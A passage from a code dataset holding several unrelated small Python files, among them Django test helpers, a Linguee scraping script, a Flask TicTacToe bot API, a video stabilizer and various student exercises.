1.02, 'Virtual hand with vibrations')\nfig.colorbar(img, location = 'right')\nelecs = elec_leg \n#plt.subplots_adjust(wspace=0.2, hspace=0.05)\nfreq_leg = np.arange(3,84,4)\nfreq_leg_str =[str(f) for f in freq_leg]\nplt.xticks(np.linspace(0,1,21),freq_leg_str)\nx8Hz = 0.061\nx30Hz = 0.34\ncol = \"black\"\nls = \"--\"\nlw = 0.7\nfor ax in axs.flat:\n ax.axvline(x=x8Hz,color=col,ls=ls,lw=lw)\n ax.axvline(x=x30Hz,color=col,ls=ls,lw=lw)\nplt.yticks(np.linspace(1/(len(elecs)*2.5),1-1/(len(elecs)*2.5),len(elecs)),elecs.iloc[::-1])\nfor ax in axs.flat:\n for elecPos in [0.107,0.286,0.428,0.608,0.75,0.9293]:\n ax.axhline(y=elecPos,color=\"dimgray\",lw=0.25)\n#plt.tight_layout(pad=0.04) \nraw_signal.plot(block=True)#specifier le x\n","repo_name":"cdussard/M2data_analysis","sub_path":"analyse_M2/saison_2/permutationFtestV2.py","file_name":"permutationFtestV2.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35960130641","text":"# Standard Library\nimport functools\n\n# Third Party Stuff\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.db.models import signals\nfrom django.utils.six import BytesIO\nfrom PIL import Image\n\n\ndef signals_switch():\n pre_save = signals.pre_save.receivers\n post_save = signals.post_save.receivers\n\n def disconnect():\n signals.pre_save.receivers = []\n signals.post_save.receivers = []\n\n def reconnect():\n signals.pre_save.receivers = pre_save\n signals.post_save.receivers = post_save\n\n return disconnect, reconnect\n\n\ndisconnect_signals, reconnect_signals = signals_switch()\n\n\ndef set_settings(**new_settings):\n \"\"\"Decorator for set django settings that will be only available during the\n wrapped-function execution.\n\n For example:\n @set_settings(FOO='bar')\n def myfunc():\n ...\n\n @set_settings(FOO='bar')\n class TestCase:\n ...\n \"\"\"\n def decorator(testcase):\n if type(testcase) is type:\n namespace = {\n 'OVERRIDE_SETTINGS': new_settings, 'ORIGINAL_SETTINGS': {}}\n wrapper = type(testcase.__name__, (SettingsTestCase, testcase),\n namespace)\n else:\n @functools.wraps(testcase)\n def wrapper(*args, **kwargs):\n old_settings = override_settings(new_settings)\n try:\n testcase(*args, **kwargs)\n finally:\n override_settings(old_settings)\n\n return wrapper\n\n return decorator\n\n\ndef override_settings(new_settings):\n old_settings = {}\n for name, new_value in list(new_settings.items()):\n old_settings[name] = getattr(settings, name, None)\n setattr(settings, name, new_value)\n return old_settings\n\n\nclass SettingsTestCase(object):\n @classmethod\n def setup_class(cls):\n cls.ORIGINAL_SETTINGS = override_settings(cls.OVERRIDE_SETTINGS)\n\n @classmethod\n def teardown_class(cls):\n override_settings(cls.ORIGINAL_SETTINGS)\n cls.OVERRIDE_SETTINGS.clear()\n\n\ndef get_dict_from_list_where(my_list, key, value):\n \"\"\"see: http://stackoverflow.com/a/7079297/782901\"\"\"\n return next((item for item in my_list if item[key] == value), None)\n\n\ndef create_image(storage, filename, size=(100, 100), image_mode='RGB', image_format='PNG'):\n \"\"\"\n Generate a test image, returning the filename that it was saved as.\n\n If ``storage`` is ``None``, the BytesIO containing the image data\n will be passed instead.\n \"\"\"\n data = BytesIO()\n Image.new(image_mode, size).save(data, image_format)\n data.seek(0)\n if not storage:\n return data\n image_file = ContentFile(data.read())\n return storage.save(filename, image_file)\n","repo_name":"CuriousLearner/nexus","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21228388674","text":"# try makes it so that you can have the interpreter not show the normal error message, and instead print out a string\n# that the creator sets\ntry:\n age = int(input('Age: '))\n income = 20000\n risk = income / age\n print(age)\nexcept ZeroDivisionError:\n print('Age cannot be zero')\nexcept ValueError:\n print('Invalid value')","repo_name":"tylertamalunas/MoshYoutube","sub_path":"Mosh-youtube/Lessons/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"348070840","text":"import pandas as pd\r\n\r\n\r\ndef read_parse_csv(filename):\r\n print(f\"Lettura di '{filename}'...\")\r\n with open(filename, \"r\") as f:\r\n df = pd.read_csv(f,sep=',',dtype='unicode')\r\n dataDict = df.to_dict(\"records\")\r\n print(\"Lettura del file CSV completata\")\r\n return dataDict\r\n","repo_name":"elesci97/Progetto_Smarthome","sub_path":"Client/csvReader.py","file_name":"csvReader.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26238868822","text":"from network.scene import Scene as _Scene\n\nfrom .entity import Actor, Entity\nfrom .resources import ResourceManager\nfrom .timers import TimerManager\nfrom .physics import create_network_physics_manager\n\n\nfrom os import path\n\n\nclass Scene(_Scene):\n\n def __init__(self, world, name):\n super().__init__(world, name)\n\n self.timer_manager = TimerManager()\n self.resource_manager = ResourceManager(path.join(world.root_filepath, name))\n self.network_physics_manager = create_network_physics_manager(world)\n self.entity_builder = self._create_entity_builder()\n\n self.messenger.add_subscriber(\"replicable_created\", self._on_replicable_created)\n self.messenger.add_subscriber(\"replicable_removed\", self._on_replicable_destroyed)\n\n def _create_entity_builder(self):\n raise NotImplementedError\n\n def _on_replicable_created(self, replicable):\n if isinstance(replicable, Entity):\n self.entity_builder.load_entity(replicable)\n\n if isinstance(replicable, Actor):\n self.network_physics_manager.add_actor(replicable)\n\n def _on_replicable_destroyed(self, replicable):\n if isinstance(replicable, Actor):\n self.network_physics_manager.remove_actor(replicable)\n\n if isinstance(replicable, Entity):\n self.entity_builder.unload_entity(replicable)\n\n def _on_tick(self):\n self.network_physics_manager.tick()\n self.timer_manager.update(1 / self.world.tick_rate)\n\n def tick(self):\n self.messenger.send(\"tick\")\n self._on_tick()\n self.messenger.send(\"post_tick\")\n","repo_name":"agoose77/PyAuthServer","sub_path":"game_system/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"7630955155","text":"import requests\nimport codecs\nfrom bs4 import BeautifulSoup\nimport time\n\n#pip install beautifulsoup4 requests codecs\n\nword_array = [\n\"Hochzeit\",\n\"weinen\",\n\"Verlobter\",\n\"worüber\",\n\"aufgeregt\",\n\"furchtbar\",\n\"überhaupt\",\n\"ständig\",\n\"niesen\",\n\"während\",\n]\n\noutput_text = \"\"\nfor word in word_array:\n time.sleep(3)\n url_base = \"https://www.linguee.com/english-german/search?source=german?destination=english?&query=\" + word\n page = requests.get(url_base)\n soup = BeautifulSoup(page.text, \"html.parser\")\n print(word)\n results = soup.find(id=\"dictionary\")\n\n translations = results.find_all(\"div\", class_=\"lemma featured\")\n output_text += word + \";\\\"\"\n for translation in translations:\n output_text += \"\\n
    - Position: \" + translation.find(\"span\", class_=\"tag_wordtype\").text.strip()\n output_text += \"\\n
    DE: \" + translation.find(\"a\", class_=\"dictLink\").text.strip()\n output_text += \"\\n
    EN: \" + translation.find(\"a\", class_=\"dictLink featured\").text.strip()\n\n examples = translation.find_all(\"span\", class_=\"tag_e\") \n if examples:\n output_text += \"\\n
    Examples: \"\n for example in examples:\n output_text += \"\\n
    DE: \" + example.find(\"span\", class_=\"tag_s\").text.strip()\n output_text += \"\\n
    EN: \" + example.find(\"span\", class_=\"tag_t\").text.strip()\n if examples.index(example) == len(examples)-1:\n output_text += \"\\n

    \"\n else:\n output_text += \"\\n
    -\"\n else:\n output_text += \"\\n

    \"\n \n output_text += \"\\\"\\n\"\n \n\n\n#print(output_text)\n\nf = codecs.open(\"sample.txt\", \"w\", \"utf-8\")\nf.write(output_text)\n\nwrite_history = codecs.open(\"translator_history.txt\", \"a\", \"utf-8\")\nwrite_history.write(\"\\n\" + str(word_array))\n","repo_name":"dvrocha/de-lernen","sub_path":"translatorv2.py","file_name":"translatorv2.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30398138690","text":"class InsufficientFundsError(Exception):\r\n pass\r\n\r\n\r\ndef simulate_shop():\r\n items = {\r\n \"aPPlE\": 50,\r\n \"bAnaNa\": 75,\r\n \"laPtoP\": 150\r\n }\r\n\r\n customer_balance = 100\r\n\r\n print(\"Welcome to the shop!\")\r\n print(\"Here are the available items and their prices:\")\r\n for item, price in items.items():\r\n print(f\"{item}: £{price}\")\r\n print(\"Type 'exit' to leave the shop.\")\r\n\r\n try:\r\n for _ in range(3):\r\n option = input(\"Enter the item you want to purchase: \")\r\n\r\n if option == \"exit\":\r\n print(\"Thank you for visiting the shop!\")\r\n return\r\n\r\n if option not in items:\r\n raise ValueError(\"Invalid input! Please select a valid item.\")\r\n\r\n price = items[option]\r\n\r\n if price > customer_balance:\r\n raise InsufficientFundsError(\"You don't have enough money to purchase this item.\")\r\n\r\n customer_balance -= price\r\n print(f\"Here's your {option}!\")\r\n\r\n except InsufficientFundsError as e:\r\n print(str(e))\r\n response = input(\"Do you have more money? (yes/no): \")\r\n\r\n if response.lower() == \"yes\":\r\n extra_money = float(input(\"Enter the additional amount of money you have: \"))\r\n customer_balance += extra_money\r\n print(\"Additional money added to your balance.\")\r\n simulate_shop()\r\n else:\r\n print(\"Sorry, you don't have enough money to continue shopping.\")\r\n\r\n except ValueError as e:\r\n print(str(e))\r\n simulate_shop()\r\n\r\n else:\r\n print(\"You have reached the maximum number of items to purchase.\")\r\n print(\"Thank you for visiting the shop!\")\r\n\r\n finally:\r\n print(\"Exiting the shop.\")\r\n\r\n\r\nsimulate_shop()\r\n","repo_name":"Heying778/foundation-homework4","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74587831787","text":"from fastapi import APIRouter, BackgroundTasks\n\nfrom app.repository import QuestionRepository\nfrom app.schemas.question import QuestionRequest, QuestionResponse\n\nquestion_router = APIRouter(prefix=\"/questions\", tags=[\"Questions\"])\n\n\n@question_router.post('/', response_model=QuestionResponse)\nasync def get_question(\n data: QuestionRequest,\n questions: QuestionRepository,\n background_tasks: BackgroundTasks,\n):\n background_tasks.add_task(questions.add_records, data.questions_num)\n return await questions.get_last_record()\n","repo_name":"Dzigr/quiz","sub_path":"app/routers/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70232071146","text":"#мы исходим из предположения, что пиксели квадратные\nresolution = str(input('enter your screen resolution (separated with a space): '))\nresolution = resolution.split()\nfirst_resolution = int(resolution[0])\nsecond_resolution = int(resolution[1])\nratio = first_resolution / second_resolution\n\nscreen_size = float(input('enter your screen size: '))\n\nstandard_ratio_height = first_resolution / 16 * 9\n#дальше надо найти диагональ этой части (как?)\n\n#a2 + b2 = c2\n#для экрана 16:9 будет так: 337x2 = diag^2\n\n\n\n\n#if ratio == (16 / 9):\n #print('16:9... classics')\n#elif ratio < (16 / 9):\n #we have what I call a mac screen\n #print('you apple-loving scrum')\n#else:\n #print('netflix n chill?')\n\n#print(first_resolution, second_resolution, screen_size)\n","repo_name":"nowhenman/LearningGit","sub_path":"mac screens.py","file_name":"mac screens.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41912406683","text":"import pygame\r\nimport math\r\n\r\nclass View_top():\r\n def __init__(self, data):\r\n self.total_data=data\r\n self.id=data[\"id\"]\r\n self.pos=data[\"pos\"]\r\n self.num=data[\"num\"]\r\n self.active=data[\"active\"]\r\n self.color=(0, 255, 255)\r\n self.border_color=(0, 0, 0)\r\n self.active_border_color=(255, 0, 0)\r\n self.border_radius=2\r\n self.radius=15\r\n\r\n\r\n def set_parameters(self, parameters= [(0, 255, 255), (0, 0, 0), (255, 0, 0), 15, 2]):\r\n self.color=parameters[0]\r\n self.border_color=parameters[1]\r\n self.active_border_color=parameters[2]\r\n self.radius=parameters[3]\r\n self.border_radius=parameters[4]\r\n\r\n\r\n def is_clicked(self, click):\r\n dist = math.floor(math.sqrt((self.pos[0] - click[0]) * (self.pos[0] - click[0])\r\n + (self.pos[1] - click[1]) * (self.pos[1] - click[1])))\r\n if dist <= self.radius+self.border_radius:\r\n return self.id\r\n elif dist <= (self.radius+self.border_radius) * 5:\r\n return \"near\"\r\n return None\r\n\r\n\r\n def draw(self, screen):\r\n if self.active:\r\n pygame.draw.circle(screen, self.active_border_color, self.pos, self.radius+self.border_radius)\r\n else:\r\n pygame.draw.circle(screen, self.border_color, self.pos, self.radius+self.border_radius)\r\n pygame.draw.circle(screen, self.color, self.pos, self.radius)\r\n myfont = pygame.font.SysFont('Arial', self.radius)\r\n textsurface = myfont.render(str(self.num), False, (0, 0, 0))\r\n text_width = textsurface.get_width()\r\n text_height = textsurface.get_height()\r\n screen.blit(textsurface,(self.pos[0] - text_width/2,self.pos[1]-text_height/2))\r\n\r\n","repo_name":"Nmachekhin/graphs_builder","sub_path":"view_top.py","file_name":"view_top.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31565515367","text":"\"\"\"\nFunctions for various purposes in GWLF.\n\nAuthor:\n Brogan McCawley (16/08/2021)\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom .exceptions import DirectoryNotEmptyError\nfrom .exceptions import DiscontinuousTimeseriesError\n\n\ndef check_empty_dir(dir_path: str) -> None:\n \"\"\"\n Checks if 'dir_path' is empty and raises DirectoryNotEmptyError if not\n \"\"\"\n if len(os.listdir(dir_path)) != 0:\n raise DirectoryNotEmptyError(f'\\n\\nMake sure \"{dir_path}\" is empty.\\n')\n\n\ndef check_timeseries_continuity(df: pd.DataFrame, freq: str = 'D') -> None:\n \"\"\"\n Checks if dataframe index is a continuous timeseries (no missing rows)\n \"\"\"\n diffs = pd.date_range(\n start=df.index[0], end=df.index[-1], freq=freq).difference(df.index)\n if len(diffs) > 0:\n raise DiscontinuousTimeseriesError(str(diffs))\n\n\ndef line_prepender(file_path: str, line: str) -> None:\n \"\"\"Prepend lines at the start of a text file\"\"\"\n with open(file_path, 'r+') as f:\n content = f.read()\n f.seek(0, 0)\n f.write(line.rstrip('\\r\\n') + '\\n' + content)\n\n\ndef clear_dir(dir_path: str) -> None:\n \"\"\"\n Check if 'dir_path' is empty and delete any files present upon user request\n \"\"\"\n files = os.listdir(dir_path)\n\n if len(files) != 0:\n while True:\n print(f\"\\nThe directory '{dir_path}' is not empty.\")\n answer = input(\n \"Do you wish to delete all files located here? (Y/N)\")\n\n if answer.upper() == 'Y':\n for f in files:\n os.remove(os.path.join(dir_path, f))\n break\n\n elif answer.upper() == 'N':\n raise DirectoryNotEmptyError()\n\n else:\n continue\n\n\ndef countlines(start, lines=0, header=True, begin_start=None):\n if header:\n print('{:>10} |{:>10} | {:<20}'.format('ADDED', 'TOTAL', 'FILE'))\n print('{:->11}|{:->11}|{:->20}'.format('', '', ''))\n\n for thing in os.listdir(start):\n thing = os.path.join(start, thing)\n if os.path.isfile(thing):\n if thing.endswith('.py'):\n with open(thing, 'r') as f:\n newlines = f.readlines()\n newlines = len(newlines)\n lines += newlines\n\n if begin_start is not None:\n reldir_of_thing = '.' + thing.replace(begin_start, '')\n else:\n reldir_of_thing = '.' + thing.replace(start, '')\n\n print('{:>10} |{:>10} | {:<20}'.format(\n newlines, lines, reldir_of_thing))\n\n for thing in os.listdir(start):\n thing = os.path.join(start, thing)\n if os.path.isdir(thing):\n lines = countlines(thing, lines, header=False, begin_start=start)\n\n return lines\n","repo_name":"BMcCawley/GWLForecaster","sub_path":"GWLForecaster_dev/session_resources/model_resources/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34682851384","text":"import numpy as np\nimport pandas as pd\nfrom babs_visualizations import usage_stats\n\ndef question_3(data):\n \"\"\"\n This function will check that the sample data has been wrangled properly.\n \"\"\"\n\n n_correct = 0\n\n # Check that there are a correct number of lines in the dataset.\n if data.shape[0] != 27345:\n print(\"Expected 27,345 data points, found only {:d}.\".format(data.shape[0]))\n else:\n n_correct += 1\n\n # Check that the durations have been converted into terms of minutes.\n data_duration_stats = usage_stats(data, verbose = False)\n expected_duration_stats = np.array([6.816667, 10.716667, 17.28333])\n if not np.allclose(data_duration_stats, expected_duration_stats):\n print(\"Duration statistics do not match expected units (minutes).\")\n if np.allclose(data_duration_stats, np.array([409, 643, 1037])):\n print(\" It looks like the units are still in terms of seconds.\")\n elif np.allclose(data_duration_stats, np.array([24520, 38580, 62220])):\n print(\" It looks like you might have used the wrong operator in your conversion.\")\n print(\" Remember that there are 60 seconds in each minute.\")\n else:\n n_correct += 1\n\n # Check that the timestamps have been wrangled properly.\n expected_time_vals = {'start_month': [25243, 2102],\n 'start_hour': [2851, 2291, 2219, 2171, 2131, 1976,\n 1833, 1799, 1791, 1644, 1359, 1269,\n 1071, 797, 644, 440, 394, 276,\n 153, 65, 55, 45, 42, 29],\n 'weekday': [4712, 4493, 4370, 3860, 3637, 3138, 3135]}\n\n for column in expected_time_vals.keys():\n col_data = data[column].value_counts().values\n n_values = len(col_data)\n n_values_expected = len(expected_time_vals[column])\n if not n_values == n_values_expected:\n print(\"Wrong number of unique values found for column: {}\".format(column))\n print(\" {:d} unique values expected; {:d} values found.\".format(n_values_expected, n_values))\n elif not np.array_equal(col_data, expected_time_vals[column]):\n expected_max = expected_time_vals[column][0]\n expected_min = expected_time_vals[column][-1]\n print(\"Unexpected count of values for column: {}\".format(column))\n print(\" Most common value expected {:d} data points; {:d} trips found.\".format(expected_max, col_data[0]))\n print(\" Least common value expected {:d} data points; {:d} trips found.\".format(expected_min, col_data[-1]))\n else:\n n_correct += 1\n\n if n_correct == len(expected_time_vals.keys()) + 2:\n print(\"All counts are as expected!\")","repo_name":"udacity/data-analyst","sub_path":"projects_zh/P0 bike_sharing/babs_datacheck.py","file_name":"babs_datacheck.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"37"} +{"seq_id":"22753995441","text":"import numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom bokeh.layouts import gridplot\nfrom bokeh.plotting import figure, show\n\niris = load_iris()\nX = iris.data\ny = iris.target\n\nclf = LogisticRegression(random_state=0, multi_class='multinomial')\nclf.fit(X, y)\n\nplots = []\nfor i in range(4):\n for j in range(i+1, 4):\n p = figure(title=f\"Class distribution by {iris.feature_names[i]} and {iris.feature_names[j]}\",\n x_axis_label=iris.feature_names[i],\n y_axis_label=iris.feature_names[j])\n classes = [0, 1, 2]\n colors = ['red', 'green', 'blue']\n for c, color in zip(classes, colors):\n idx = np.where(y == c)[0]\n p.circle(X[idx, i], X[idx, j], color=color, alpha=0.5, legend_label=f\"Class {c}\")\n\n xx, yy = np.meshgrid(np.linspace(X[:, i].min(), X[:, i].max(), 100),\n np.linspace(X[:, j].min(), X[:, j].max(), 100))\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel(), xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n p.multi_line(xs=[xx[Z == c] for c in classes],\n ys=[yy[Z == c] for c in classes],\n color=colors,\n line_width=2)\n plots.append(p)\n\nshow(gridplot(plots, ncols=2))\n","repo_name":"Sisyphoz/ml-sklearn-bokeh","sub_path":"sklearn_bokeh_v1.py","file_name":"sklearn_bokeh_v1.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29665180943","text":"# Installed package\nimport numpy as np\nimport cv2\nfrom vidgear.gears import VideoGear\n\n\ndef stablize_video(path = 'video.mp4'):\n '''\n Function for stablizing Videos\n\n path : str\n Path of the video file\n\n Returns\n None\n\n '''\n # open any valid video stream with stabilization enabled(`stabilize = True`)\n stream_stab = VideoGear(source=path, stabilize=True, **{\"SMOOTHING_RADIUS\":50, \"BORDER_TYPE\":\"replicate\"}).start()\n\n # open same stream without stabilization for comparison\n stream_org = VideoGear(source=path).start()\n\n # loop over\n while True:\n\n # read stabilized frames\n frame_stab = stream_stab.read()\n\n # check for stabilized frame if Nonetype\n if frame_stab is None:\n break\n\n # read un-stabilized frame\n frame_org = stream_org.read()\n\n # concatenate both frames\n output_frame = np.concatenate((frame_org, frame_stab), axis=1)\n\n # put text over concatenated frame\n cv2.putText(\n output_frame,\n \"Before\",\n (10, output_frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.6,\n (0, 255, 0),\n 2,\n )\n cv2.putText(\n output_frame,\n \"After\",\n (output_frame.shape[1] // 2 + 10, output_frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.6,\n (0, 255, 0),\n 2,\n )\n \n output_frame = cv2.resize(output_frame, (0, 0), fx = 0.3, fy = 0.3)\n # Show output window\n cv2.imshow(\"Stabilized Frame\", output_frame)\n\n # check for 'q' key if pressed\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n # close output window\n cv2.destroyAllWindows()\n\n # safely close both video streams\n stream_org.stop()\n stream_stab.stop()\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='FcarScan Task - Video stabilization')\n\n parser.add_argument('--path', default='video.mp4', type=str, help='Path of the Video file')\n\n args = parser.parse_args()\n\n stablize_video(path = args.path)","repo_name":"bijonguha/Video-Stablization","sub_path":"img_stab.py","file_name":"img_stab.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23146318486","text":"from configparser import ConfigParser\r\n\r\ndef config(filename=\"database.ini\", section=\"postgresql\"):\r\n #Se crea parser\r\n parser = ConfigParser()\r\n # read config file\r\n parser.read(filename)\r\n db = {}\r\n if parser.has_section(section):\r\n params = parser.items(section)\r\n for param in params:\r\n db[param[0]] = param[1]\r\n else:\r\n raise Exception('Section{0} is not found in the {1} file. rgt'.format(section, filename))\r\n print(db)\r\n \r\nconfig()","repo_name":"MatiasRGT/BaseDatos1_uni","sub_path":"no_usados/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36824199059","text":"from django import forms\nfrom django.db import models\n\nfrom mainapp.models import User, School, Room, Building, Topic, Course, Program, CourseSchedule, Question\nIMP_CHOICES = (\n ('Nepal', 'Nepal'),\n ('Bhutan', 'Bhutan'),\n ('Sweden', 'Sweden'),\n)\netcfield = models.CharField(max_length=100, choices=IMP_CHOICES)\n\n\nclass StaffForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('dob', 'special_care_needed', 'subject_of_interest',)\n\n\nclass StudentForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('designation',)\n\n\nclass ParentForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('designation', 'subject_of_interest', 'special_care_needed','dob',)\n\n\n\n\ndef getform(formtype):\n if formtype == 'Schools':\n modelform = School\n elif formtype == 'Rooms':\n modelform = Room\n elif formtype == 'Buildings':\n modelform = Building\n elif formtype == 'Topics':\n modelform = Topic\n elif formtype == 'Courses':\n modelform = Course\n elif formtype == 'Programs':\n modelform = Program\n elif formtype == 'CourseSchedules':\n modelform = CourseSchedule\n elif formtype == 'Questions':\n modelform = Question\n return(modelform)\n\nclass MyStyleForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(MyStyleForm, self).__init__(*args, **kwargs)\n\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n","repo_name":"surazaz/Social_network","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71942463148","text":"'''\nCreated on 2015年12月12日\nhttps://leetcode.com/problems/minimum-height-trees/\n@author: Darren\n'''\n'''\nFor a undirected graph with tree characteristics, we can choose any node as the root. The result graph is then a rooted tree. Among all possible rooted trees, those with minimum height are called minimum height trees (MHTs). Given such a graph, write a function to find all the MHTs and return a list of their root labels.\n\nFormat\nThe graph contains n nodes which are labeled from 0 to n - 1. You will be given the number n and a list of undirected edges (each edge is a pair of labels).\n\nYou can assume that no duplicate edges will appear in edges. Since all edges are undirected, [0, 1] is the same as [1, 0] and thus will not appear together in edges.\n\nExample 1:\n\nGiven n = 4, edges = [[1, 0], [1, 2], [1, 3]]\n\n 0\n |\n 1\n / \\\n 2 3\nreturn [1]\n\nExample 2:\n\nGiven n = 6, edges = [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]]\n\n 0 1 2\n \\ | /\n 3\n |\n 4\n |\n 5\nreturn [3, 4]\n'''\ndef findMinHeightTrees(n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n if not edges or n==1:\n return [0]\n adj=[set() for i in range(n)]\n for i,j in edges:\n adj[i].add(j)\n adj[j].add(i)\n leaves=[nodeIndex for nodeIndex in range(n) if len(adj[nodeIndex])==1]\n while n>2:\n n-=len(leaves)\n newLeaves=[]\n for leaf in leaves:\n adjLeaf=adj[leaf].pop()\n adj[adjLeaf].remove(leaf)\n if len(adj[adjLeaf])==1:\n newLeaves.append(adjLeaf)\n leaves=newLeaves\n return leaves\nn = 6\nedges = [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]] \nprint(findMinHeightTrees(n, edges)) \n ","repo_name":"darrencheng0817/AlgorithmLearning","sub_path":"Python/leetcode/minimumHeightTrees.py","file_name":"minimumHeightTrees.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4307137515","text":"import logging\nfrom urllib import response\nfrom bot import Bot\nfrom tictactoe import TicTacToe\nfrom tictactoenet import TicTacToeNet\nfrom utils import *\nimport numpy as np\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom os import environ\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef factory(): \n argsEasy = dotdict({\n 'numMCTSRuns': 5, # number of MCTS runs per move in game \n 'cpuct': 1, # upper confidence bound exploration hyperparameter\n })\n\n argsHard = dotdict({\n 'numMCTSRuns': 20, # number of MCTS runs per move in game \n 'cpuct': 1, # upper confidence bound exploration hyperparameter\n })\n\n netArgs = dotdict({\n 'lr': 0.001,\n 'numEpochs': 100,\n 'batchSize': 64,\n })\n\n game = TicTacToe()\n\n netEasy = TicTacToeNet(game, netArgs) \n botEasy = Bot(game, netEasy, argsEasy)\n botEasyDirectoryPath = \"./experiments/2022-02-19-21:59:00/bot0\"\n botEasy.load(botEasyDirectoryPath)\n\n netHard = TicTacToeNet(game, netArgs) \n botHard = Bot(game, netHard, argsHard)\n botHardDirectoryPath = \"./experiments/2021-12-31-15:54:17/bot3\"\n botHard.load(botHardDirectoryPath)\n\n app = Flask(__name__)\n CORS(app)\n\n @app.route(\"/\")\n def welcome():\n return f'Welcome to the Alpha TicTacToe Zero Server'\n\n @app.route('/api', methods=[\"GET\", 'POST'])\n def api():\n if request.method == \"POST\":\n dic = request.get_json()\n if 'botIsO' not in dic or 'easyMode' not in dic or 'boardString' not in dic: return f\"request is not valid\"\n print(dic)\n botIsO, easyMode, boardString = dic['botIsO'], dic['easyMode'], dic['boardString']\n board = np.zeros((3, 3))\n if not (boardString and len(boardString) == 9): return f'boardString length is not valid'\n for r in range(3):\n for c in range(3):\n d = boardString[3*r + c]\n if d == 'o': board[r][c] = 1\n elif d == 'x': board[r][c] = -1\n elif d == '-': continue\n else: return f'boardString value at index {r * 3 + c} is not valid'\n if game.get_outcome(board) != None: return f'game has ended'\n canonicalBoard = game.get_canonical_board(board, 1) if botIsO == \"true\" else game.get_canonical_board(board, -1)\n pi = botEasy.get_pi(canonicalBoard, temp=0) if easyMode == \"true\" else botHard.get_pi(canonicalBoard, temp=0)\n a = np.random.choice(len(pi), p=pi)\n return f\"{a}\", 200\n else:\n message = {\"greeting\": \"Hello from the API\"}\n return jsonify(message)\n\n return app\n \nif __name__ == \"__main__\":\n app = factory()\n app.run(host='127.0.0.1', port=environ.get('PORT', 5000))","repo_name":"TeYuanLiu/alpha_zero","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28859447992","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'anidex_django.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^refresh', 'index.views.get_stats'),\n url(r'^$', 'index.views.main'),\n url(r'^whitelist', 